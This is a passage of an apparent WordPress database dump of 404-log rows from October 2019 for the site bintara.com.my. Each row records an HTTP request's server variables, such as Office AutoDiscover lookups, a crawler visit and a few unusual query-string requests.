y\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/2018/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:6:\"/2018/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa42KxAAxqfYqgF3mYfWYwAAAEw\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/2018/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/2018/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa42KxAAxqfYqgF3mYfWYwAAAEw\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"5.100.249.231\";s:11:\"REMOTE_PORT\";s:5:\"45162\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/2018/\";s:10:\"SCRIPT_URL\";s:6:\"/2018/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa42KxAAxqfYqgF3mYfWYwAAAEw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571698219.7179\";s:12:\"REQUEST_TIME\";s:10:\"1571698219\";}}','notice','2019-10-21 22:50:21','2019-10-21 22:50:20',34966784,36775448,'https://bintara.com.my/2018/?key=testActivation',1,0,'5.100.249.231'),(28682,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:41:\"/2018/?initiationactivity=initiationready\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/2018/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:6:\"/2018/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa427OAgYuZ1@aLzbZgR0wAAAJA\";s:19:\"REDIRECT_SCRIPT_URI\";s:28:\"https://bintara.com.my/2018/\";s:19:\"REDIRECT_SCRIPT_URL\";s:6:\"/2018/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa427OAgYuZ1@aLzbZgR0wAAAJA\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"5.100.249.231\";s:11:\"REMOTE_PORT\";s:5:\"57124\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:28:\"https://bintara.com.my/2018/\";s:10:\"SCRIPT_URL\";s:6:\"/2018/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa427OAgYuZ1@aLzbZgR0wAAAJA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571698412.6974\";s:12:\"REQUEST_TIME\";s:10:\"1571698412\";}}','notice','2019-10-21 22:53:34','2019-10-21 22:53:33',34970056,36777392,'https://bintara.com.my/2018/?initiationactivity=initiationready',1,0,'5.100.249.231'),(28683,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"318\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"D2C15943-82C8-414D-A974-B2D9C102A46E\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa5NyqAwEvHJaKWJ1hZBfAAAAAk\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.245\";s:11:\"REMOTE_PORT\";s:5:\"53264\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa5NyqAwEvHJaKWJ1hZBfAAAAAk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571704266.666\";s:12:\"REQUEST_TIME\";s:10:\"1571704266\";}}','notice','2019-10-22 00:31:09','2019-10-22 00:31:07',35668256,37466184,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.245'),(28684,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:40:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:32:\"/send-quote-panasonic-toughbook/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"deflate, gzip\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:66:\"Mozilla/5.0 (compatible; AhrefsBot/6.1; +http://ahrefs.com/robot/)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:54:\"https://bintara.com.my/send-quote-panasonic-toughbook/\";s:19:\"REDIRECT_SCRIPT_URL\";s:32:\"/send-quote-panasonic-toughbook/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa5OR@AgYuZ1@aLzbZgWWAAAAJg\";s:12:\"REDIRECT_URL\";s:32:\"/send-quote-panasonic-toughbook/\";s:11:\"REMOTE_ADDR\";s:13:\"54.36.148.186\";s:11:\"REMOTE_PORT\";s:5:\"44498\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:54:\"https://bintara.com.my/send-quote-panasonic-toughbook/\";s:10:\"SCRIPT_URL\";s:32:\"/send-quote-panasonic-toughbook/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa5OR@AgYuZ1@aLzbZgWWAAAAJg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571704391.638\";s:12:\"REQUEST_TIME\";s:10:\"1571704391\";}}','notice','2019-10-22 00:33:13','2019-10-22 00:33:12',34968600,36770600,'https://bintara.com.my/send-quote-panasonic-toughbook/',1,0,'54.36.148.186'),(28685,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"9436624B-239C-45D7-B2F9-F506B2B0173A\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa5Oh5-09PeaulOT6TbdbwAAAMU\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.245\";s:11:\"REMOTE_PORT\";s:5:\"49920\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa5Oh5-09PeaulOT6TbdbwAAAMU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571704455.8234\";s:12:\"REQUEST_TIME\";s:10:\"1571704455\";}}','notice','2019-10-22 00:34:17','2019-10-22 00:34:16',35273432,37076024,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.245'),(28686,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"0B7882F3-6C88-42DA-90CE-13CB62D70503\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa5Pb5-09PeaulOT6TbdyQAAAME\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.245\";s:11:\"REMOTE_PORT\";s:5:\"50360\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa5Pb5-09PeaulOT6TbdyQAAAME\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571704687.4808\";s:12:\"REQUEST_TIME\";s:10:\"1571704687\";}}','notice','2019-10-22 00:38:09','2019-10-22 00:38:07',35273432,37076024,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.245'),(28687,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:70:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.4639; Pro)\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:21:\"HTTP_X_OFFICE_VERSION\";s:9:\"16.0.4639\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa5TCKAwEvHJaKWJ1hZCawAAAAo\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"49.50.237.136\";s:11:\"REMOTE_PORT\";s:5:\"32826\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa5TCKAwEvHJaKWJ1hZCawAAAAo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571705609.141\";s:12:\"REQUEST_TIME\";s:10:\"1571705609\";}}','notice','2019-10-22 00:53:32','2019-10-22 00:53:29',35726120,37530632,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'49.50.237.136'),(28688,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"7AB98C5B-DF2D-4325-AB12-485591254130\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa5T05-09PeaulOT6TbgxAAAANA\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:15:\"115.132.144.245\";s:11:\"REMOTE_PORT\";s:5:\"54154\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa5T05-09PeaulOT6TbgxAAAANA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571705811.9903\";s:12:\"REQUEST_TIME\";s:10:\"1571705811\";}}','notice','2019-10-22 00:56:53','2019-10-22 00:56:52',35271792,37070928,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.245'),(28689,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; 